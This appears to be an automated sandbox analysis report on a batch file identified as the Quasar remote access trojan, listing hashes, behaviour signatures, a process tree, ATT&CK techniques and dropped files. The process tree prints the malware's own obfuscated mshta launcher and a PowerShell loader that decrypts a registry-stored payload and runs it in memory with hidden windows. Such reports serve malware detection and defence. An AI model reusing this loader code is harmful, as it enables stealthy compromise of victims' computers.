Analysis

  • max time kernel
    64s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 15:43

General

  • Target

    uni.bat

  • Size

    15.5MB

  • MD5

    180cabfef9e517bf8a30eaf917fb06ca

  • SHA1

    d47987045a7f1888b9a2a8c0159b5bd2c9d79274

  • SHA256

    fe831f43955da5cacbdf9eb8331cb62907141cb0f566b53e5a5f222fe30ee78c

  • SHA512

    91fed14301919d6a0514dd843e6ffaae07fc538199644f4c9033a3ef717a65974ba940ae6646fd4289c614138adbd385b3706169b1754cd8d5b9ef04891f91bb

  • SSDEEP

    49152:mcIdr0nn+8BsYSVa+P+J0XCCeRWpsKlP7k7o6SwofCLl7w+i2+SpQf86Gtpek1GI:1

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 11 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:688
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:968
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:532
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          1⤵
            PID:436
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:1036
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1040
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1192
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:3080
                    • C:\Windows\$sxr-mshta.exe
                      C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ehBGaRlEODKWQQdTfvks4312:mHbogDVz=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                      2⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Modifies registry class
                      • Suspicious use of WriteProcessMemory
                      PID:1932
                      • C:\Windows\$sxr-cmd.exe
                        "C:\Windows\$sxr-cmd.exe" /c %$sxr-ehBGaRlEODKWQQdTfvks4312:mHbogDVz=%
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3316
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:IOwodPhXUR; "
                          4⤵
                            PID:396
                          • C:\Windows\$sxr-powershell.exe
                            C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:4828
                            • C:\Windows\$sxr-cmd.exe
                              "C:\Windows\$sxr-cmd.exe" /C set "KlqXYEaCOp=[System.Diagnostics.Process]::GetProcessById(4828).WaitForExit();[System.Threading.Thread]::Sleep(5000); function bCipR($pdCcE){ $azyxY=[System.Security.Cryptography.Aes]::Create(); $azyxY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $azyxY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $azyxY.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('Bn03cunjzaZMJkse/750PEbINesOLpXMJ3bFGmsT9f0='); $azyxY.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('iPrq3j/amXn4XerqJiVgBg=='); $tTxtH=$azyxY.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $jJfIY=$tTxtH.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($pdCcE, 0, $pdCcE.Length); $tTxtH.Dispose(); $azyxY.Dispose(); $jJfIY;}function dvTyf($pdCcE){ $uqlzn=New-Object System.IO.MemoryStream(,$pdCcE); $FEoEw=New-Object System.IO.MemoryStream; Invoke-Expression '$JpuBF @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$uqlzn,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $JpuBF.CopyTo($FEoEw); $JpuBF.Dispose(); $uqlzn.Dispose(); $FEoEw.Dispose(); $FEoEw.ToArray();}function kWCWt($pdCcE){ $jJfIY = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($pdCcE); $jJfIY = bCipR($jJfIY); $jJfIY = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($jJfIY); return $jJfIY;}function execute_function($pdCcE,$YIILW){ $zOdZE = @( '$YCSSl = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::@L@o@a@d@([byte[]]$pdCcE);'.Replace('@', ''), '$lsNPY = $YCSSl.EntryPoint;', '$lsNPY.Invoke($null, $YIILW);' ); foreach ($vSDVd in $zOdZE) { Invoke-Expression $vSDVd };}$KXrrS = kWCWt('jf2bvKDN5CoTgv5C072QvQ==');$ZZfQS = kWCWt('TMKlLadAhTHf+0yxOesGPhFDPPQghCW4KfrD05tKmpk=');$XFOhA = kWCWt('WUH2+BYck7a4wQjKSs9LRQ==');$REsor = kWCWt('Y8w7AU29S6DlwioFmC47tw==');if (@(get-process -ea silentlycontinue $REsor).count -gt 1) {exit};$HAnLi = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($KXrrS).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($ZZfQS);$ecBcW=dvTyf (bCipR ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($HAnLi)));execute_function $ecBcW (,[string[]] ($XFOhA));" & echo Invoke-Expression $env:KlqXYEaCOp; | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul
                              5⤵
                              • Executes dropped EXE
                              PID:4416
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:KlqXYEaCOp; "
                                6⤵
                                  PID:2436
                                • C:\Windows\$sxr-powershell.exe
                                  C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5072
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                        • Drops file in System32 directory
                        PID:1220
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1292
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1352
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1372
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1384
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1392
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1544
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1564
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1572
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1636
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1712
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1796
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1820
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1944
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1952
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1964
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2040
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2120
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                            PID:2140
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2260
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2308
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2444
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2452
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:2588
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2656
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2684
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2704
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2724
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2940
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:2484
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3144
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3456
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3536
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\uni.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:5044
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:jgzkrJoqAf; "
                                                                                      3⤵
                                                                                        PID:400
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Deletes itself
                                                                                        • Drops file in Windows directory
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4352
                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                      2⤵
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:1144
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3656
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3848
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                        1⤵
                                                                                          PID:3116
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:3376
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                            1⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:1420
                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                            1⤵
                                                                                              PID:2536
                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                              1⤵
                                                                                                PID:1412
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                1⤵
                                                                                                  PID:1816
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:4124
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:2632
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                      1⤵
                                                                                                        PID:4492
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                          PID:1432
                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                          1⤵
                                                                                                            PID:4336
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                            1⤵
                                                                                                              PID:3720
                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:4620
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                1⤵
                                                                                                                  PID:3828
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                  1⤵
                                                                                                                    PID:2784

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                  Execution

                                                                                                                  Command and Scripting Interpreter

                                                                                                                  1
                                                                                                                  T1059

                                                                                                                  PowerShell

                                                                                                                  1
                                                                                                                  T1059.001

                                                                                                                  Discovery

                                                                                                                  Query Registry

                                                                                                                  3
                                                                                                                  T1012

                                                                                                                  System Information Discovery

                                                                                                                  3
                                                                                                                  T1082

                                                                                                                  Peripheral Device Discovery

                                                                                                                  1
                                                                                                                  T1120

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                    Filesize

                                                                                                                    53KB

                                                                                                                    MD5

                                                                                                                    a26df49623eff12a70a93f649776dab7

                                                                                                                    SHA1

                                                                                                                    efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                                    SHA256

                                                                                                                    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                                    SHA512

                                                                                                                    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfsin3j1.qow.ps1
                                                                                                                    Filesize

                                                                                                                    60B

                                                                                                                    MD5

                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                    SHA1

                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                    SHA256

                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                    SHA512

                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                  • C:\Windows\$sxr-cmd.exe
                                                                                                                    Filesize

                                                                                                                    283KB

                                                                                                                    MD5

                                                                                                                    8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                    SHA1

                                                                                                                    f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                    SHA256

                                                                                                                    b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                    SHA512

                                                                                                                    99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                  • C:\Windows\$sxr-mshta.exe
                                                                                                                    Filesize

                                                                                                                    14KB

                                                                                                                    MD5

                                                                                                                    0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                    SHA1

                                                                                                                    51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                    SHA256

                                                                                                                    dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                    SHA512

                                                                                                                    d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    Filesize

                                                                                                                    442KB

                                                                                                                    MD5

                                                                                                                    04029e121a0cfa5991749937dd22a1d9

                                                                                                                    SHA1

                                                                                                                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                    SHA256

                                                                                                                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                    SHA512

                                                                                                                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                  • memory/436-131-0x0000025690CA0000-0x0000025690CC9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/532-127-0x00000231BD260000-0x00000231BD289000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/532-119-0x00000231BD260000-0x00000231BD289000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/532-126-0x00000231BD260000-0x00000231BD289000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/532-125-0x00007FFA65A10000-0x00007FFA65A20000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/688-93-0x000001D8CCA80000-0x000001D8CCAA3000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    140KB

                                                                                                                  • memory/688-103-0x000001D8CCAB0000-0x000001D8CCAD9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/688-94-0x000001D8CCAB0000-0x000001D8CCAD9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/688-95-0x000001D8CCAB0000-0x000001D8CCAD9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/688-101-0x00007FFA65A10000-0x00007FFA65A20000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/688-102-0x000001D8CCAB0000-0x000001D8CCAD9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/968-113-0x00007FFA65A10000-0x00007FFA65A20000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    64KB

                                                                                                                  • memory/968-115-0x000002BFB5BD0000-0x000002BFB5BF9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/968-114-0x000002BFB5BD0000-0x000002BFB5BF9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/968-107-0x000002BFB5BD0000-0x000002BFB5BF9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    164KB

                                                                                                                  • memory/1144-1-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-9-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-2-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-10-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-8-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-0-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-6-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-7-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-12-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/1144-11-0x00000189F6E90000-0x00000189F6E91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/4352-35-0x000001A7B5650000-0x000001A7B5658000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4352-28-0x00007FFAA4C00000-0x00007FFAA4CBE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    760KB

                                                                                                                  • memory/4352-43-0x00007FF7E3030000-0x00007FF7E30A1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    452KB

                                                                                                                  • memory/4352-45-0x000001A781EC0000-0x000001A781EC8000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    32KB

                                                                                                                  • memory/4352-46-0x0000000180000000-0x0000000180007000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    28KB

                                                                                                                  • memory/4352-41-0x000001A782C30000-0x000001A782C88000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    352KB

                                                                                                                  • memory/4352-40-0x000001A782BF0000-0x000001A782C26000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    216KB

                                                                                                                  • memory/4352-39-0x000001A782B40000-0x000001A782BF2000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    712KB

                                                                                                                  • memory/4352-24-0x000001A7B7B10000-0x000001A7B7B86000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    472KB

                                                                                                                  • memory/4352-30-0x000001A781D70000-0x000001A781D92000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/4352-34-0x000001A781D90000-0x000001A781D96000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                  • memory/4352-13-0x000001A7B5600000-0x000001A7B5622000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/4352-23-0x000001A7B7AC0000-0x000001A7B7B04000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    272KB

                                                                                                                  • memory/4352-25-0x000001A780310000-0x000001A780DBC000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    10.7MB

                                                                                                                  • memory/4352-26-0x000001A780DC0000-0x000001A7818AC000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    10.9MB

                                                                                                                  • memory/4352-42-0x000001A782C90000-0x000001A782CBE000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    184KB

                                                                                                                  • memory/4352-27-0x00007FFAA5990000-0x00007FFAA5B85000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    2.0MB

                                                                                                                  • memory/4352-29-0x000001A781C70000-0x000001A781D6C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    1008KB

                                                                                                                  • memory/4352-31-0x000001A781DB0000-0x000001A781DB6000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    24KB

                                                                                                                  • memory/4352-32-0x000001A781DC0000-0x000001A781E1E000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    376KB

                                                                                                                  • memory/4352-33-0x000001A781E20000-0x000001A781E78000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    352KB

